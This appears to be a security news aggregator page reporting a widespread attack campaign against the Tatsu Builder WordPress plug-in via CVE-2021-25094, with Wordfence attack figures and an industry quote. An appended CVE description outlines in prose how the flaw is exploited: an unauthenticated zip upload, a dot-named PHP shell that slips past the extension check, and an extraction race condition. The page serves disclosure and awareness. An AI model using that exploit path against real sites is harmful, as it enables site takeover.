Security
Headlines
HeadlinesLatestCVEs

Headline

Widespread Attack on WordPress Sites Targets Tatsu Builder Plug-in

A widespread attack is underway to exploit known RCE flaw in Tatsu Builder WordPress plug-in, according to a new report.

DARKReading
#vulnerability#web#wordpress#intel#rce

A no-code page builder WordPress plug-in, Tatsu Builder, has a known remote code execution (RCE) flaw that’s under active attack, researchers report, exposing as many as 50,000 sites to takeover.

The Wordfence threat intelligence team is raising the alarm over what it calls a “widespread” attack attempting to exploit CVE-2021-25094, publicly disclosed on March 24. The vulnerability impacts both the premium and free versions of Tatsu Builder.

Because it’s not listed on Wordpress.org, the team says it doesn’t know exactly how many installations the plug-in has, but they estimate it’s anywhere from 20,000 to 50,000 sites.

The Wordfence report says the Wordpress plug-in attacks first popped up on May 10, and by May 14 threat actors had already launched 5.9 million attacks against 1.4 million sites running Tatsu Builder.

“When it comes to cybersecurity, most organizations give little thought to their websites," Chris Olson, CEO of the Media Trust, said in a statement in reaction to the attacks. “The Tatsu vulnerability shows us why this is a mistake: websites — which play a key role in marketing and revenue generation — are increasingly targeted by hackers, making them a source of risk to customers and casual visitors.”

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Related news

WordPress Tatsu Builder Remote Code Execution

WordPress Tatsu Builder plugin versions prior to 3.3.13 suffer from an unauthenticated remote code execution vulnerability.

CVE-2021-25094

The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.

DARKReading: Latest News

Defining & Defying Cybersecurity Staff Burnout